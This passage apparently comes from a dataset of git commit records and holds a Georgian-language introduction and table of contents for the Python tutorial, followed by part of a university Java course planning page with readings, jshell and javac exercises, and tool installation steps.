Steps Towards Programming\n\t* 4. More Control Flow Tools\n\t\t**4.1. if Statements\n\t\t**4.2. for Statements\n\t\t**4.3. The range() Function\n\t\t**4.4. break and continue Statements, and else Clauses on Loops\n\t\t**4.5. pass Statements\n\t\t**4.6. Defining Functions\n\t\t**4.7. More on Defining Functions\n\t\t\t***4.7.1. Default Argument Values\n\t\t\t***4.7.2. Keyword Arguments\n\t\t\t***4.7.3. Arbitrary Argument Lists\n\t\t\t***4.7.4. Unpacking Argument Lists\n\t\t\t***4.7.5. Lambda Expressions\n\t\t\t***4.7.6. Documentation Strings\n\t\t\t***4.7.7. Function Annotations\n\t\t**4.8. Intermezzo: Coding Style\n\t* 5. Data Structures\n\t\t**5.1. More on Lists\n\t\t\t***5.1.1. Using Lists as Stacks\n\t\t\t***5.1.2. Using Lists as Queues\n\t\t\t***5.1.3. List Comprehensions\n\t\t\t***5.1.4. Nested List Comprehensions\n\t\t**5.2. The del statement\n\t\t**5.3. Tuples and Sequences\n\t\t**5.4. Sets\n\t\t**5.5. Dictionaries\n\t\t**5.6. Looping Techniques\n\t\t**5.7. More on Conditions\n\t\t**5.8. Comparing Sequences and Other Types\n\t* 6. Modules\n\t\t**6.1. More on Modules\n\t\t**6.1.1. Executing modules as scripts\n\t\t**6.1.2. The Module Search Path\n\t\t**6.1.3. \u201cCompiled\u201d Python files\n\t\t**6.2. Standard Modules\n\t\t**6.3. The dir() Function\n\t\t**6.4. Packages\n\t\t**6.4.1. Importing * From a Package\n\t\t**6.4.2. Intra-package References\n\t\t**6.4.3. Packages in Multiple Directories\n\t* 7. Input and Output\n\t\t**7.1. Fancier Output Formatting\n\t\t**7.1.1. Old string formatting\n\t\t**7.2. Reading and Writing Files\n\t\t**7.2.1. Methods of File Objects\n\t\t**7.2.2. Saving structured data with json\n\t* 8. Errors and Exceptions\n\t\t**8.1. Syntax Errors\n\t\t**8.2. Exceptions\n\t\t**8.3. Handling Exceptions\n\t\t**8.4. Raising Exceptions\n\t\t**8.5. User-defined Exceptions\n\t\t**8.6. Defining Clean-up Actions\n\t\t**8.7. Predefined Clean-up Actions\n\t* 9. Classes\n\t\t**9.1. A Word About Names and Objects\n\t\t**9.2. Python Scopes and Namespaces\n\t\t**9.2.1. Scopes and Namespaces Example\n\t\t**9.3. A First Look at Classes\n\t\t**9.3.1. Class Definition Syntax\n\t\t**9.3.2. Class Objects\n\t\t**9.3.3. Instance Objects\n\t\t**9.3.4. Method Objects\n\t\t**9.3.5. Class and Instance Variables\n\t\t**9.4. Random Remarks\n\t\t**9.5. Inheritance\n\t\t**9.5.1. Multiple Inheritance\n\t\t**9.6. Private Variables\n\t\t**9.7. Odds and Ends\n\t\t**9.8. Exceptions Are Classes Too\n\t\t**9.9. Iterators\n\t\t**9.10. Generators\n\t\t**9.11. Generator Expressions\n\t* 10. Brief Tour of the Standard Library\n\t\t**10.1. Operating System Interface\n\t\t**10.2. File Wildcards\n\t\t**10.3. Command Line Arguments\n\t\t**10.4. Error Output Redirection and Program Termination\n\t\t**10.5. String Pattern Matching\n\t\t**10.6. Mathematics\n\t\t**10.7. Internet Access\n\t\t**10.8. Dates and Times\n\t\t**10.9. Data Compression\n\t\t**10.10. Performance Measurement\n\t\t**10.11. Quality Control\n\t\t**10.12. Batteries Included\n\t* 11. Brief Tour of the Standard Library \u2013 Part II\n\t\t**11.1. Output Formatting\n\t\t**11.2. Templating\n\t\t**11.3. Working with Binary Data Record Layouts\n\t\t**11.4. Multi-threading\n\t\t**11.5. Logging\n\t\t**11.6. Weak References\n\t\t**11.7. Tools for Working with Lists\n\t\t**11.8. Decimal Floating Point Arithmetic\n\t* 12. Virtual Environments and Packages\n\t\t**12.1. Introduction\n\t\t**12.2. Creating Virtual Environments\n\t\t**12.3. Managing Packages with pip\n\t* 13. What Now?\n\t* 14. Interactive Input Editing and History Substitution\n\t\t**14.1. Tab Completion and History Editing\n\t\t**14.2. Alternatives to the Interactive Interpreter\n\t* 15. Floating Point Arithmetic: Issues and Limitations\n\t\t**15.1. Representation Error\n\t* 16. Appendix\n\t\t**16.1. Interactive Mode\n\t\t\t***16.1.1. Error Handling\n\t\t\t***16.1.2. Executable Python Scripts\n\t\t\t***16.1.3. The Interactive Startup File\n\t\t\t***16.1.4. The Customization Modules\n\n\n:hp-tags: python[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],tutorial[\u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8]","old_contents":"= \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10d0\u10ee\u10d4\u10da\u10db\u10eb\u10e6\u10d5\u10d0\u10dc\u10d4\u10da\u10dd - \u10dc\u10d0\u10ec\u10d8\u10da\u10d8 1\n:hp-alt-title: the python tutorial - part 1\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10d3\u10d5\u10d8\u10da\u10d0\u10d3 \u10e1\u10d0\u10e1\u10ec\u10d0\u10d5\u10da\u10d8, \u10eb\u10da\u10d8\u10d4\u10e0\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0. \u10db\u10d0\u10e1 \u10d0\u10e5\u10d5\u10e1 \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d0\u10e6\u10d0\u10da\u10d8 \u10d3\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e1\u10e2\u10e0\u10e3\u10e5\u10e2\u10e3\u10e0\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8, \u10db\u10d0\u10d2\u10e0\u10d0\u10db \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d8\u10d3\u10d2\u10dd\u10db\u10d0 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d6\u10d4 \u10dd\u10e0\u10d8\u10d4\u10dc\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1(OOP). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d4\u10da\u10d4\u10d2\u10d0\u10dc\u10e2\u10e3\u10e0\u10d8 \u10e1\u10d8\u10dc\u10e2\u10d0\u10e5\u10e1\u10d8 \u10d3\u10d0 \u10d3\u10d8\u10dc\u10d0\u10db\u10d8\u10e3\u10e0\u10dd\u10d1\u10d0\u10e1\u10d7\u10d0\u10dc \u10d4\u10e0\u10d7\u10d0\u10d3 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10d2\u10d0\u10e0\u10d4\u10db\u10dd, \u10e5\u10db\u10dc\u10d8\u10e1 \u10d8\u10d3\u10d4\u10d0\u10da\u10e3\u10e0 \u10d4\u10dc\u10d0\u10e1 \u10e1\u10d9\u10e0\u10d8\u10de\u10e2\u10d8\u10dc\u10d2\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1(scripting) \u10d3\u10d0 \u10e1\u10ec\u10e0\u10d0\u10e4\u10d8 application development-\u10d7\u10d5\u10d8\u10e1 \u10d1\u10d4\u10d5\u10e0 \u10e1\u10e4\u10d4\u10e0\u10dd\u10e8\u10d8 \u10e1\u10d0\u10e3\u10d9\u10d4\u10d7\u10d4\u10e1\u10dd \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d4\u10d1\u10d6\u10d4.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10d8 \u10d3\u10d0 \u10db\u10d7\u10da\u10d8\u10d0\u10dc\u10d8 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10ee\u10d4\u10da\u10db\u10d8\u10e1\u10d0\u10ec\u10d5\u10d3\u10dd\u10db\u10d8\u10d0 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d1\u10d8\u10dc\u10d0\u10e0\u10e3\u10da\u10d8 \u10e4\u10dd\u10e0\u10db\u10d8\u10d7 \u10e7\u10d5\u10d4\u10da\u10d0 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d0\u10d6\u10d4 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d5\u10d4\u10d1 \u10e1\u10d0\u10d8\u10e2\u10d8\u10d3\u10d0\u10dc https:\/\/www.python.org \u10d3\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10d0. \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10db\u10d0\u10d5\u10d4 \u10e1\u10d0\u10d8\u10e2\u10d6\u10d4 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10e3\u10da\u10d8\u10d0 \u10e3\u10e4\u10d0\u10e1\u10dd \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d4\u10d1\u10d8, \u10ee\u10d4\u10da\u10e1\u10d0\u10ec\u10e7\u10dd\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10d3\u10d0\u10db\u10d0\u10d7\u10d4\u10d1\u10d8\u10d7\u10d8 \u10d3\u10dd\u10d9\u10e3\u10db\u10d4\u10dc\u10e2\u10d0\u10ea\u10d8\u10d0.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d0\u10d3 \u10d2\u10e0\u10eb\u10d4\u10da\u10d3\u10d4\u10d1\u10d0 \u10d0\u10ee\u10d0\u10da\u10d8 \u10e4\u10e3\u10dc\u10e5\u10ea\u10d8\u10d4\u10d1\u10d8\u10e1 \u10d3\u10d0 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e2\u10d8\u10de\u10d4\u10d1\u10d8\u10e1 \u10d2\u10d0\u10dc\u10ee\u10dd\u10e0\u10ea\u10d8\u10d4\u10da\u10d4\u10d1\u10d0 C \u10d0\u10dc C++ \u10d6\u10d4 (\u10d0\u10dc \u10e1\u10ee\u10d5\u10d0 \u10d4\u10dc\u10d4\u10d1\u10d6\u10d4 \u10d2\u10d0\u10db\u10dd\u10eb\u10d0\u10ee\u10d4\u10d1\u10e3\u10da\u10d8 C-\u10d3\u10d0\u10dc). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10e1\u10d0\u10e4\u10d4\u10e0\u10d8\u10e1\u10d8 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d2\u10d0\u10e4\u10d0\u10e0\u10d7\u10dd\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0 \u10d0\u10de\u10da\u10d8\u10d9\u10d0\u10ea\u10d8\u10d8\u10e1 \u10d9\u10dd\u10dc\u10e4\u10d8\u10d2\u10e3\u10e0\u10d0\u10ea\u10d8\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1.\n\n\u10d4\u10e1 \u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8 \u10d0\u10e0\u10d0\u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0\u10d0\u10d3 \u10ec\u10d0\u10e0\u10e3\u10d3\u10d2\u10d4\u10dc\u10e1 \u10db\u10d9\u10d8\u10d7\u10ee\u10d5\u10d4\u10da\u10e1, \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10ea\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1, \u10d7\u10d5\u10d8\u10e1\u10d4\u10d1\u10d4\u10d1\u10e1 \u10d3\u10d0 \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10e1. \u10d4\u10e1 \u10ee\u10d4\u10da\u10e1 \u10e3\u10ec\u10e7\u10dd\u10d1\u10e1 \u10e5\u10dd\u10dc\u10d3\u10d4\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10de\u10e0\u10d0\u10e5\u10e2\u10d8\u10d9\u10e3\u10da\u10d8 \u10d2\u10d0\u10db\u10dd\u10ea\u10d3\u10d8\u10da\u10d4\u10d1\u10d0.\n\n\u10d0\u10db\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1 \u10d0\u10e6\u10ec\u10d4\u10e0\u10d8\u10da\u10d8\u10d0 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10d8\u10ee\u10d8\u10da\u10d4\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0(https:\/\/docs.python.org\/3.5\/library\/index.html#library-index[Python Standard Library]). https:\/\/docs.python.org\/3.5\/reference\/index.html#reference-index[Python Language Reference] \u10d8\u10eb\u10da\u10d4\u10d5\u10d0 \u10e3\u10e4\u10e0\u10dd \u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0 \u10d2\u10d0\u10dc\u10db\u10d0\u10e0\u10e2\u10d4\u10d1\u10d0\u10e1 \u10d4\u10dc\u10d0\u10d6\u10d4. \u10d9\u10dd\u10d3\u10d8\u10e1 \u10d3\u10d0\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10e1\u10d0\u10eb\u10da\u10d4\u10d1\u10d4\u10da\u10d8\u10d0 C, C++ \u10d6\u10d4, \u10ec\u10d0\u10d8\u10d9\u10d8\u10d7\u10ee\u10d4\u10d7 https:\/\/docs.python.org\/3.5\/extending\/index.html#extending-index[Extending and Embedding the Python Interpreter] \u10d3\u10d0 https:\/\/docs.python.org\/3.5\/c-api\/index.html#c-api-index[Python\/C API Reference Manual.] \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10e0\u10e1\u10d4\u10d1\u10dd\u10d1\u10e1 \u10e0\u10d0\u10db\u10d3\u10d4\u10dc\u10d8\u10db\u10d4 \u10ec\u10d8\u10d2\u10dc\u10d8, \u10e0\u10dd\u10db\u10d4\u10da\u10d8\u10ea \u10db\u10dd\u10d8\u10ea\u10d0\u10d5\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10e1 \u10e1\u10d8\u10e6\u10e0\u10db\u10d8\u10e1\u10d4\u10e3\u10da\u10d0\u10d3.\n\n\u10e8\u10d4\u10e1\u10d0\u10d5\u10d0\u10da\u10d8:\n\n\t* 1. Whetting Your Appetite\n\t* 2. Using the Python Interpreter\n\t\t**2.1. Invoking the Interpreter\n\t\t\t***2.1.1. Argument Passing\n\t\t\t***2.1.2. Interactive Mode\n\t\t**2.2. The Interpreter and Its Environment\n\t\t\t***2.2.1. Source Code Encoding\n\t* 3. An Informal Introduction to Python\n\t\t**3.1. Using Python as a Calculator\n\t\t\t***3.1.1. Numbers\n\t\t\t***3.1.2. Strings\n\t\t\t***3.1.3. Lists\n\t\t**3.2. First Steps Towards Programming\n\t* 4. More Control Flow Tools\n\t\t**4.1. if Statements\n\t\t**4.2. for Statements\n\t\t**4.3. The range() Function\n\t\t**4.4. break and continue Statements, and else Clauses on Loops\n\t\t**4.5. pass Statements\n\t\t**4.6. Defining Functions\n\t\t**4.7. More on Defining Functions\n\t\t\t***4.7.1. Default Argument Values\n\t\t\t***4.7.2. Keyword Arguments\n\t\t\t***4.7.3. Arbitrary Argument Lists\n\t\t\t***4.7.4. Unpacking Argument Lists\n\t\t\t***4.7.5. Lambda Expressions\n\t\t\t***4.7.6. Documentation Strings\n\t\t\t***4.7.7. Function Annotations\n\t\t**4.8. Intermezzo: Coding Style\n\t* 5. Data Structures\n\t\t**5.1. More on Lists\n\t\t\t***5.1.1. Using Lists as Stacks\n\t\t\t***5.1.2. Using Lists as Queues\n\t\t\t***5.1.3. List Comprehensions\n\t\t\t***5.1.4. Nested List Comprehensions\n\t\t**5.2. The del statement\n\t\t**5.3. Tuples and Sequences\n\t\t**5.4. Sets\n\t\t**5.5. Dictionaries\n\t\t**5.6. Looping Techniques\n\t\t**5.7. More on Conditions\n\t\t**5.8. Comparing Sequences and Other Types\n\t* 6. Modules\n\t\t**6.1. More on Modules\n\t\t**6.1.1. Executing modules as scripts\n\t\t**6.1.2. The Module Search Path\n\t\t**6.1.3. \u201cCompiled\u201d Python files\n\t\t**6.2. Standard Modules\n\t\t**6.3. The dir() Function\n\t\t**6.4. Packages\n\t\t**6.4.1. Importing * From a Package\n\t\t**6.4.2. Intra-package References\n\t\t**6.4.3. Packages in Multiple Directories\n\t* 7. Input and Output\n\t\t**7.1. Fancier Output Formatting\n\t\t**7.1.1. Old string formatting\n\t\t**7.2. Reading and Writing Files\n\t\t**7.2.1. Methods of File Objects\n\t\t**7.2.2. Saving structured data with json\n\t* 8. Errors and Exceptions\n\t\t**8.1. Syntax Errors\n\t\t**8.2. Exceptions\n\t\t**8.3. Handling Exceptions\n\t\t**8.4. Raising Exceptions\n\t\t**8.5. User-defined Exceptions\n\t\t**8.6. Defining Clean-up Actions\n\t\t**8.7. Predefined Clean-up Actions\n\t* 9. Classes\n\t\t**9.1. A Word About Names and Objects\n\t\t**9.2. Python Scopes and Namespaces\n\t\t**9.2.1. Scopes and Namespaces Example\n\t\t**9.3. A First Look at Classes\n\t\t**9.3.1. Class Definition Syntax\n\t\t**9.3.2. Class Objects\n\t\t**9.3.3. Instance Objects\n\t\t**9.3.4. Method Objects\n\t\t**9.3.5. Class and Instance Variables\n\t\t**9.4. Random Remarks\n\t\t**9.5. Inheritance\n\t\t**9.5.1. Multiple Inheritance\n\t\t**9.6. Private Variables\n\t\t**9.7. Odds and Ends\n\t\t**9.8. Exceptions Are Classes Too\n\t\t**9.9. Iterators\n\t\t**9.10. Generators\n\t\t**9.11. Generator Expressions\n\t* 10. Brief Tour of the Standard Library\n\t\t**10.1. Operating System Interface\n\t\t**10.2. File Wildcards\n\t\t**10.3. Command Line Arguments\n\t\t**10.4. Error Output Redirection and Program Termination\n\t\t**10.5. String Pattern Matching\n\t\t**10.6. Mathematics\n\t\t**10.7. Internet Access\n\t\t**10.8. Dates and Times\n\t\t**10.9. Data Compression\n\t\t**10.10. Performance Measurement\n\t\t**10.11. Quality Control\n\t\t**10.12. Batteries Included\n\t* 11. Brief Tour of the Standard Library \u2013 Part II\n\t\t**11.1. Output Formatting\n\t\t**11.2. Templating\n\t\t**11.3. Working with Binary Data Record Layouts\n\t\t**11.4. Multi-threading\n\t\t**11.5. Logging\n\t\t**11.6. Weak References\n\t\t**11.7. Tools for Working with Lists\n\t\t**11.8. Decimal Floating Point Arithmetic\n\t* 12. Virtual Environments and Packages\n\t\t**12.1. Introduction\n\t\t**12.2. Creating Virtual Environments\n\t\t**12.3. Managing Packages with pip\n\t* 13. What Now?\n\t* 14. Interactive Input Editing and History Substitution\n\t\t**14.1. Tab Completion and History Editing\n\t\t**14.2. Alternatives to the Interactive Interpreter\n\t* 15. Floating Point Arithmetic: Issues and Limitations\n\t\t**15.1. Representation Error\n\t* 16. Appendix\n\t\t**16.1. Interactive Mode\n\t\t\t***16.1.1. Error Handling\n\t\t\t***16.1.2. Executable Python Scripts\n\t\t\t***16.1.3. The Interactive Startup File\n\t\t\t***16.1.4. The Customization Modules\n\n\n:hp-tags: python[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],tutorial[\u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0f609b35570eb12b113c96c52952894c0284e136","subject":"Deadline+","message":"Deadline+\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"L3a.adoc","new_file":"L3a.adoc","new_contents":"= Planning\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThe entry page of the Java course in L3.\n\n== Prerequisites\nYou know algorithmics and, preferrably, the basic syntax of Java (or a related language). If you have followed an algorithmics course with illustrations and exercices in Java, you satisfy the prerequisites.\n\n== Abbreviations\n\n* [I]: Important\n* [O]: Optional (do it if you are specifically interested in the related aspect)\n* ESx.y (or ESx.y.z): designates section x.y (or x.y.z) in Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book] (in chapter x)\n* EQx: quiz chapter x\n* EQx.y: question number y in Eck\u2019s book, from quiz chapter x\n* EEx.y: exercice number y in Eck\u2019s book, from exercices chapter x\n* Ranges are always given with ends included (EQ1.3 to 1.9 means 3 and 9 included)\n* Markers apply to the whole line. Example: \"4.3 intro to 4.3.2, 4.6.1 [I]\" means that everything in between 4.3 and 4.3.2 plus 4.6.1 are important.\n\n== General references\n* Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book]\n* St\u00e9phane Airiau\u2019s https:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/[course] (in French)\n* The https:\/\/app.gosoapbox.com\/event\/290081765\/[confusion barometer]\n* https:\/\/pixees.fr\/informatiquelycee\/[Site] de David Roche\n\n=== Take notes\n* 5 ways of taking notes https:\/\/www.youtube.com\/watch?v=AffuwyJZTQQ[video]\n* https:\/\/doi.org\/10.1177\/0956797614524581[Research] shows that taking notes, and especially writing what is said in your own words after some mental processing, permits more effective study\n\nLinks taken from the https:\/\/www.edx.org\/bio\/eric-s-lander[course] \u201cIntroduction to Biology - The Secret of Life\u201d, MITx\n\/\/www.edx.org\/course\/introduction-to-biology-the-secret-of-life-4, www.edx.org\/course?search_query=introduction%20to%20biology%20-%20the%20secret%20of%20life&level=introductory\n\n== Planning\n\n[[S1]]\n=== S1 (5 & 6 Feb 2020)\n\n*First half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Pr%C3%A9sentation%20du%20cours%20Objet\/presentation.pdf[Pres course]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Syntaxe\/presentation.pdf[Syntax] (without classes and objects) [Should be known or easy]\n* *Exercice* with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/jshell.html[jshell] (or https:\/\/tryjshell.org\/[online]):\n** Assign 4659 and 23 to variables, and show the result of multiplying these variables\n** Show the greatest divisor of 4659 that is different than 4659 (use the `%` operator and a loop)\n** Define a method that accepts an integer parameter and returns its greatest divisor except itself; use it to show the greatest divisor of 4659.\n** Going beyond: https:\/\/arbitrary-but-fixed.net\/teaching\/java\/jshell\/2017\/12\/14\/jshell-peculiarities.html[The peculiarities of the JShell]\n* Syntax (end): classes (no objects)\n** Material: http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.4] (Building blocks of programs), 2 intro (names and things), 2.1 (basic Java application), 2.2 (variables and primitive types), 2.3.3 (operations on strings), 2.4.1 (basic and formatted output), 2.5 (expressions), 2.6.7 (packages), ES3 intro to 3.6 (blocks, loops, algorithmic development, switch) [Should be known or easy]\n** http:\/\/math.hws.edu\/javanotes\/c2\/[ES2.2.1] (variables), 2.3.1 (subroutines), 2.4.6 (scanner for input) [I]\n** ES1.6 (modern UI), 1.7 (internet) [O]\n* *Exercice* with a text editor: define a class `MyMathClass` containing the method above and a method that returns the smallest divisor (greater than one) of its parameter; and a class `MyBooleanClass` containing a method `xor` returning `true` iff exactly one of its parameter is `true`. Copy-paste this in jshell and make sure you can call all these methods from jshell. (TODO home)\n\n*Todo*\n\n* Install a https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Various.adoc#installing-the-jdk[JDK] from OpenJDK (11 or ulterior)\n* Install https:\/\/www.eclipse.org\/downloads\/packages\/[Eclipse IDE] \u201cfor Java Developers\u201d\n* Install https:\/\/git-scm.com\/download[git]\n* Redirect your e-mails @ Dauphine if necessary to ensure you receive announcements posted on MyCourse\n\n*Second half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Ex%C3%A9cution\/presentation.pdf[Ex\u00e9cution]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.1] (machine language), 1.2 (Asynchronous events), 1.3 (JVM)\n* *Exercices* (TODO home):\n** Add a `main` method to your `MyBooleanClass` that prints \u201cHello, this is my boolean class.\u201d Use `System.out.println(\"\u2026\")` to print.\n** Add a `main` method to you `MyMathClass` that accepts two arguments that can each be either `\"true\"` or `\"false\"`; the method calls your `xor` method with the corresponding parameters and prints the result.\n** Compile `MyBooleanClass` with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/javac.html[javac], move the resulting file into its own folder, execute it from the source folder.\n** Find out _in the official documentation_ how to compile the class and let the resulting class be placed in its own folder, in a single step (without you having to move the file afterwards)\n** Compile `MyMathClass`, move the resulting file into its own folder (alone), and execute it from the source folder. Why does it fail? What does the error message indicate, and how is it related to the problem? Fix the problem and execute it, first by grouping the class files, second, while keeping both class files in different folders.\n** (link:http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.1] to 2.2, supposedly known)\n** http:\/\/math.hws.edu\/javanotes\/c1\/quiz.html[EQ1.3] to 1.9\n** http:\/\/math.hws.edu\/javanotes\/c2\/quiz.html[EQ2.1] to 2.4; 2.6 to 2.9; 2.11\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.5] (objects), 2.3.2 (classes and objects)\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.3] to 2.6*; use Scanner, not TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]*: use user input (Scanner) instead of file input; do not use TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3*\n** *EE3.4, 3.6 [I]*\n** EE3.8, 3.9 [O]\n\n[[S2]]\n=== S2 (28 Feb)\n\n* Supposed known: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git]; https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Shell.adoc[Shell]; Execution (see above).\n* Reminder: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** Two roles of classes; static VS instance methods (whose behavior depends on values of parameters and instance attributes)\n* Note about packages (for using `Scanner`)\n** Class has a short name and a package, hence, a long name. (And two file names!)\n* *Exercices* (TODO home):\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.2] to 2.6; use Scanner, not TextIO\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]; use user input (Scanner) instead of file input; do not use TextIO\n** http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3\n** EE3.4, 3.6 [I]\n* Eclipse & Java:\n** Use Outline view\n** Use Problems view\n** Use Javadoc view\n** Content completion with CTRL+Space\n** Organize imports: from an editor, select `Source` \/ `Organize Imports`\n** In the http:\/\/help.eclipse.org\/latest\/topic\/org.eclipse.jdt.doc.user\/gettingStarted\/qs-2.htm[Basic tutorial], read: Creating a Java Class; Renaming Java elements; Navigate to a Java element's declaration; Viewing the type Hierarchy; Running your programs\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven]: Introduction\n** Exercice: *Import a Maven project into Eclipse*\n\n[[S3]]\n=== S3 (4 March)\n\n* Graded exercice similar to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Dep-Git.adoc[Dep-Git] and similar to the exercices related to 